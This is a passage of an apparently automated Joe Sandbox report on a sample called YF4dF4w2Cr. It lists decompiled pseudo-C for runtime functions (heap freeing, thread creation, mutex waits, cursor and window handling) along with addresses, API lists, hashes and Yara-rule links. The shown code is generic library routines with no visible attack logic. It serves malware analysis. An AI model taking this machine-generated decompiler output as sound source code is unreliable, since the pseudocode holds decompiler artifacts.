				 *((intOrPtr*)(__ecx)) = 0x452d9c;
				_t26 = __ecx + 0x94;
				 *(_t41 - 4) = 1;
				E00422DD3(__ecx + 0x94, __ecx + 0x94);
				_t29 =  *((intOrPtr*)(_t40 + 0x134));
				_t43 =  *((intOrPtr*)(_t40 + 0x134));
				if( *((intOrPtr*)(_t40 + 0x134)) != 0) {
					E0041B323(_t29, __edx, _t43, 1);
				}
				E00404490(_t26, 1, _t40, _t43,  *((intOrPtr*)(_t40 + 0xa8)));
				_t31 =  *((intOrPtr*)(_t40 + 0x90));
				if(_t31 != 0) {
					 *((intOrPtr*)( *_t31 + 4))(1);
				}
				_t38 = _t40 + 0x120;
				if( *_t38 != 0) {
					SetCursor(LoadCursorA(0, 0x7f00));
					DestroyCursor( *_t38);
				}
				 *(_t41 - 4) = 0;
				E00422E06(_t26);
				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
				return E00431B73(E00418FC1(_t40, _t40,  *(_t41 - 4)));
			}







                  0x0041b503
                  0x0041b50a
                  0x0041b50f
                  0x0041b511
                  0x0041b514
                  0x0041b51c
                  0x0041b525
                  0x0041b528
                  0x0041b52d
                  0x0041b533
                  0x0041b535
                  0x0041b538
                  0x0041b538
                  0x0041b543
                  0x0041b549
                  0x0041b551
                  0x0041b556
                  0x0041b556
                  0x0041b559
                  0x0041b562
                  0x0041b572
                  0x0041b57a
                  0x0041b57a
                  0x0041b582
                  0x0041b586
                  0x0041b58b
                  0x0041b59b

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Cursor$DestroyH_prolog3Loadctype
                  • String ID:
                  • API String ID: 2718315270-0
                  • Opcode ID: 646ec8a41c06d257c62a63bec00b84e5baa048c7e2c4ba5cb98eaab41f205f7f
                  • Instruction ID: 09b58abaf18f10ba53531755bae239b5462338189d74af3cd0587c3cfb6ebcff
                  • Opcode Fuzzy Hash: 646ec8a41c06d257c62a63bec00b84e5baa048c7e2c4ba5cb98eaab41f205f7f
                  • Instruction Fuzzy Hash: 2401C030600301EBCB15AF769944BADB7B1BF49305F00456EF05A972A1CB781A418B4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004316F6, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 41%
                  			E004316F6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x45df00);
				_t8 = E00431818(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0043185D(_t8);
				}
				if( *0x468784 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x466eac, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00431D3E(_t31);
						 *_t10 = E00431CFC(GetLastError());
					}
					goto L9;
				}
				E0043A0BF(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0043A0F2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0043A122();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0043174C();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                  0x004316f6
                  0x004316f8
                  0x004316fd
                  0x00431702
                  0x00431707
                  0x0043177e
                  0x00431783
                  0x00431783
                  0x00431710
                  0x00431755
                  0x00431756
                  0x0043175e
                  0x00431764
                  0x00431766
                  0x00431768
                  0x0043177b
                  0x0043177d
                  0x00000000
                  0x00431766
                  0x00431714
                  0x0043171a
                  0x0043171f
                  0x00431725
                  0x0043172a
                  0x0043172c
                  0x0043172d
                  0x0043172e
                  0x00431734
                  0x00431735
                  0x0043173c
                  0x00431745
                  0x00000000
                  0x00431747
                  0x00431747
                  0x00000000
                  0x00431747

                  APIs
                  • __lock.LIBCMT ref: 00431714
                    • Part of subcall function 0043A0BF: __mtinitlocknum.LIBCMT ref: 0043A0D5
                    • Part of subcall function 0043A0BF: __amsg_exit.LIBCMT ref: 0043A0E1
                    • Part of subcall function 0043A0BF: EnterCriticalSection.KERNEL32(0043611B,0043611B,?,0043DC06,00000004,0045E368,0000000C,004381EC,00000001,0043612A,00000000,00000000,00000000,?,0043612A,00000001), ref: 0043A0E9
                  • ___sbh_find_block.LIBCMT ref: 0043171F
                  • ___sbh_free_block.LIBCMT ref: 0043172E
                  • HeapFree.KERNEL32(00000000,00000001,0045DF00,0000000C,0043A0A0,00000000,0045E2A8,0000000C,0043A0DA,00000001,0043611B,?,0043DC06,00000004,0045E368,0000000C), ref: 0043175E
                  • GetLastError.KERNEL32(?,0043DC06,00000004,0045E368,0000000C,004381EC,00000001,0043612A,00000000,00000000,00000000,?,0043612A,00000001,00000214), ref: 0043176F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 9dc04b9689af2bf82a866fb0a8e1f056a8570705746ff3f69382913c185bb473
                  • Instruction ID: d3813c98c3fd1d5aeb6149d0b7521c20993e54d6c63caead87b5699286848da1
                  • Opcode Fuzzy Hash: 9dc04b9689af2bf82a866fb0a8e1f056a8570705746ff3f69382913c185bb473
                  • Instruction Fuzzy Hash: DD012631941201AADF343FB29C0AB1E3764AF09328F24602FF400671B1EF7C88408B9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231A9FC, Relevance: 7.5, APIs: 5, Instructions: 40synchronizationCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0231A8F0: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0231A930
                  • WaitForSingleObject.KERNEL32(00000000,?,00000000,0231AC6C), ref: 0231AA10
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,0231AC6C), ref: 0231AA44
                  • ResetEvent.KERNEL32(?,00000000,0231AC6C), ref: 0231AA58
                  • ReleaseMutex.KERNEL32(?,00000000,0231AC6C), ref: 0231AA66
                  • CloseHandle.KERNEL32(?,00000000,0231AC6C), ref: 0231AA72
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle
                  • String ID:
                  • API String ID: 3891338068-0
                  • Opcode ID: 6cd49328ec676c2f2531ba3af4da5c50d825bc0f91aa981eef4cd55127dee8a5
                  • Instruction ID: 10313f8e304c718267b0410bf0424a4779bd7a5ebff783347889a535e2e88d23
                  • Opcode Fuzzy Hash: 6cd49328ec676c2f2531ba3af4da5c50d825bc0f91aa981eef4cd55127dee8a5
                  • Instruction Fuzzy Hash: 97F04471A831159BDB3D1765BE086163A7EEB54362F16492AE845D00A0EB21CC6DCE61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420BAF, Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00420BAF(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E004209F9(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                  0x00420bb2
                  0x00420bb4
                  0x00420bba
                  0x00420bbc
                  0x00420bbc
                  0x00420bc4
                  0x00420bc9
                  0x00420bcb
                  0x00420bbc
                  0x00420bcf
                  0x00420bd4
                  0x00420bd7
                  0x00420bd7
                  0x00420bdd
                  0x00420be2
                  0x00420beb
                  0x00420bee
                  0x00420bf5
                  0x00420bf5
                  0x00420bff
                  0x00420c07

                  APIs
                  • TlsFree.KERNEL32(?,?,?,00420C15), ref: 00420BD7
                  • GlobalHandle.KERNEL32 ref: 00420BE5
                  • GlobalUnlock.KERNEL32(00000000,?,?,00420C15), ref: 00420BEE
                  • GlobalFree.KERNEL32 ref: 00420BF5
                  • DeleteCriticalSection.KERNEL32(?,?,?,00420C15), ref: 00420BFF
                    • Part of subcall function 004209F9: EnterCriticalSection.KERNEL32(00466584,00000000,00466568,00466584,00466568,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                    • Part of subcall function 004209F9: LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                    • Part of subcall function 004209F9: LocalFree.KERNEL32(?,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                    • Part of subcall function 004209F9: TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                  • String ID:
                  • API String ID: 1549993015-0
                  • Opcode ID: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction ID: 3e9e6558ba584311e6215c2e42c48fddda6ce4580923e77d2502095fd869f7fc
                  • Opcode Fuzzy Hash: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction Fuzzy Hash: 10F0903A3002205BD3215B6ABC4CE1B3AE9BF867643550669F955D3252CB64EC028668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042CD27, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042CD27(void* __ecx) {
				int _v8;

				_push(__ecx);
				_v8 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _v8;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _v8;
			}




                  0x0042cd2c
                  0x0042cd40
                  0x0042cd43
                  0x0042cd70
                  0x0042cd45
                  0x0042cd58
                  0x0042cd68
                  0x0042cd6b
                  0x0042cd6d
                  0x0042cd7d

                  APIs
                  • SaveDC.GDI32(?), ref: 0042CD3A
                  • GetStockObject.GDI32(0000000D), ref: 0042CD48
                  • SelectObject.GDI32(00000000,00000000), ref: 0042CD58
                  • SaveDC.GDI32(00000000), ref: 0042CD5D
                  • SelectObject.GDI32(00000000,?), ref: 0042CD6B
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$SaveSelect$Stock
                  • String ID:
                  • API String ID: 2785865535-0
                  • Opcode ID: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction ID: d072d42024ffe69d130f0e67522b41d9a784e59db6b74b44c5ac60acea8468f4
                  • Opcode Fuzzy Hash: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction Fuzzy Hash: BCF06D35500A14EFC7219FA6DD48D1BBBF5FB85710B104839E14652520C771FD05DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00433D96, Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E00433D96(intOrPtr __edx, void* __edi, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				struct _SECURITY_ATTRIBUTES* _v0;
				char _v4;
				DWORD* _v12;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				void* _t30;
				void* _t36;
				DWORD* _t41;
				intOrPtr* _t43;
				void* _t45;
				void* _t51;
				long _t54;
				void* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr _t71;
				void* _t74;

				_t64 = __edi;
				_t61 = __edx;
				_t74 = _v24;
				E00433BE5(_v28);
				asm("int3");
				_t71 = _t74;
				_push(_t67);
				E00435F8A();
				_t30 = E00435F6A(E00435F84());
				if(_t30 != 0) {
					_t54 = _a4;
					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
					_t61 =  *((intOrPtr*)(_t54 + 4));
					_push(_t54);
					 *((intOrPtr*)(_t30 + 4)) =  *((intOrPtr*)(_t54 + 4));
					E00436192(_t51, __edi, _t67, __eflags);
				} else {
					_t67 = _a4;
					if(E00435FBE(E00435F84(), _t67) == 0) {
						ExitThread(GetLastError());
					}
					 *_t67 = GetCurrentThreadId();
				}
				_t79 =  *0x455824;
				if( *0x455824 != 0) {
					_t45 = E0043BEC0(_t79, 0x455824);
					_pop(_t54);
					_t80 = _t45;
					if(_t45 != 0) {
						 *0x455824();
					}
				}
				E00433D61(_t61, _t64, _t67, _t80);
				asm("int3");
				_push(_t71);
				_push(_t54);
				_push(_t51);
				_push(_t64);
				_t11 =  &_v4; // 0x416327
				_t65 =  *_t11;
				_v24 = 0;
				_t81 = _t65;
				if(_t65 != 0) {
					_push(_t67);
					E00435F8A();
					_t68 = E004381D6(1, 0x214);
					__eflags = _t68;
					if(__eflags == 0) {
						L17:
						_push(_t68);
						E004316F6(0, _t65, _t68, __eflags);
						__eflags = _v12;
						if(_v12 != 0) {
							E00431D64(_v12);
						}
						_t36 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E00436178(0, _t61, _t65, __eflags) + 0x6c)));
						_push(_t68);
						E00436018(0, _t65, _t68, __eflags);
						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t68 + 0x58)) = _a12;
						_t41 = _a20;
						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
						__eflags = _t41;
						if(_t41 == 0) {
							_t20 =  &_a8; // 0x416327
							_t41 = _t20;
						}
						_t36 = CreateThread(_v0, _a4, E00433DA2, _t68, _a16, _t41);
						__eflags = _t36;
						if(__eflags == 0) {
							_v12 = GetLastError();
							goto L17;
						}
					}
				} else {
					_t43 = E00431D3E(_t81);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t43 = 0x16;
					E004367E9(_t61, _t65, _t67);
					_t36 = 0;
				}
				return _t36;
			}























                  0x00433d96
                  0x00433d96
                  0x00433d96
                  0x00433d9c
                  0x00433da1
                  0x00433da5
                  0x00433da7
                  0x00433da8
                  0x00433db3
                  0x00433dba
                  0x00433de6
                  0x00433dec
                  0x00433df2
                  0x00433df5
                  0x00433df8
                  0x00433df9
                  0x00433dfc
                  0x00433dbc
                  0x00433dbc
                  0x00433dcd
                  0x00433dd6
                  0x00433dd6
                  0x00433de2
                  0x00433de2
                  0x00433e01
                  0x00433e08
                  0x00433e0f
                  0x00433e14
                  0x00433e15
                  0x00433e17
                  0x00433e19
                  0x00433e19
                  0x00433e17
                  0x00433e1f
                  0x00433e24
                  0x00433e27
                  0x00433e2a
                  0x00433e2b
                  0x00433e2c
                  0x00433e2d
                  0x00433e2d
                  0x00433e32
                  0x00433e35
                  0x00433e37
                  0x00433e55
                  0x00433e56
                  0x00433e67
                  0x00433e6b
                  0x00433e6d
                  0x00433eb9
                  0x00433eb9
                  0x00433eba
                  0x00433ec0
                  0x00433ec3
                  0x00433ec8
                  0x00433ecd
                  0x00433ece
                  0x00433ece
                  0x00433e6f
                  0x00433e74
                  0x00433e77
                  0x00433e78
                  0x00433e80
                  0x00433e84
                  0x00433e87
                  0x00433e8c
                  0x00433e8f
                  0x00433e91
                  0x00433e93
                  0x00433e93
                  0x00433e93
                  0x00433ea6
                  0x00433eac
                  0x00433eae
                  0x00433eb6
                  0x00000000
                  0x00433eb6
                  0x00433eae
                  0x00433e39
                  0x00433e39
                  0x00433e3e
                  0x00433e3f
                  0x00433e40
                  0x00433e41
                  0x00433e42
                  0x00433e43
                  0x00433e49
                  0x00433e51
                  0x00433e51
                  0x00433ed4

                  APIs
                    • Part of subcall function 00433BE5: _doexit.LIBCMT ref: 00433BF1
                  • ___set_flsgetvalue.LIBCMT ref: 00433DA8
                    • Part of subcall function 00435F8A: TlsGetValue.KERNEL32(?,00436116,?,?,38A11573), ref: 00435F93
                    • Part of subcall function 00435F8A: __decode_pointer.LIBCMT ref: 00435FA5
                    • Part of subcall function 00435F8A: TlsSetValue.KERNEL32(00000000,?,38A11573), ref: 00435FB4
                  • ___fls_getvalue@4.LIBCMT ref: 00433DB3
                    • Part of subcall function 00435F6A: TlsGetValue.KERNEL32(?,?,00433DB8,00000000), ref: 00435F78
                  • ___fls_setvalue@8.LIBCMT ref: 00433DC6
                    • Part of subcall function 00435FBE: __decode_pointer.LIBCMT ref: 00435FCF
                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00433DCF
                  • ExitThread.KERNEL32 ref: 00433DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00433DDC
                  • __freefls@4.LIBCMT ref: 00433DFC
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00433E0F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                  • String ID:
                  • API String ID: 132634196-0
                  • Opcode ID: 2baf63a47d12a521ad33af26bfa013fcd8fc2ae0017a12262648b249769f5a7d
                  • Instruction ID: dcb9523bf8c3645b39c34fdd3cea048087dd38b06366127bac375a71ae9a6c53
                  • Opcode Fuzzy Hash: 2baf63a47d12a521ad33af26bfa013fcd8fc2ae0017a12262648b249769f5a7d
                  • Instruction Fuzzy Hash: D1E08635904A057F8F003FF38C0E88F7A2CAD0D34DF002056FD0097102EA2DD90186AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407A37, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 320COMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E00407A37(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t224;
				signed int _t231;
				intOrPtr* _t233;
				void* _t244;
				signed int _t258;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				signed int _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t233 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x118))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E00404461(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E004067B4(_t233, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t244 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t233 + 0x84);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									asm("sbb eax, eax");
									_push(_t244);
									_t224 =  ~(_a8 & 2) & 0x00007fff;
									__eflags = _t224;
									_push(_t224);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t233 + 0x148))( &_v48, _a8 & 0x00000002);
													_t231 = _a8 & 0x00000020;
													__eflags = _t231;
													if(_t231 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t231);
													_t244 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t244);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t244);
										_push( *((intOrPtr*)(_t233 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								E004071F4(_t233, _t277);
							}
							_t189 = E004070C2(_t233,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t233 + 0xa4));
								 *((intOrPtr*)(_t233 + 0xa4)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t258 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t258 = _t258 - 1;
									} while (_t258 != 0);
									_t314 = _a12 - _t258;
									if(_a12 > _t258) {
										_t278 = 0x18;
										_t213 = E00404461(_t314,  ~(_t258 & 0xffffff00 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t233 + 0x184))(_t264,  &_v64);
												E00422C3C(_t233,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t233 + 0x84);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t233 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E00406EBD(_t233, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E00412A84(_t233,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t233 + 0x184))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E00412D05(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									E00404490(_t233, _t281, _t293, _t329, _v24);
								}
								 *((intOrPtr*)(_t233 + 0xa4)) = _v48.bottom;
							}
							E00404490(_t233, _t281, _t291, _t329, _v8);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t233 + 0x148))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				E00421213( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}









































                  0x00407a44
                  0x00407a47
                  0x00407a48
                  0x00407a4c
                  0x00407a4d
                  0x00407a52
                  0x00407a55
                  0x00407a57
                  0x00407a5a
                  0x00407a64
                  0x00407a69
                  0x00407a71
                  0x00407a72
                  0x00407a7c
                  0x00407a81
                  0x00407a87
                  0x00407a8a
                  0x00407a90
                  0x00407a92
                  0x00407a96
                  0x00407a9b
                  0x00407a9c
                  0x00407a9f
                  0x00407aa4
                  0x00407aa7
                  0x00407aaa
                  0x00407aae
                  0x00407ab4
                  0x00407abc
                  0x00407ac4
                  0x00407ac7
                  0x00407b34
                  0x00407b3e
                  0x00407b40
                  0x00407b41
                  0x00407b41
                  0x00407b46
                  0x00407ac9
                  0x00407acd
                  0x00407ad5
                  0x00407ad9
                  0x00407ae3
                  0x00407ae7
                  0x00407aed
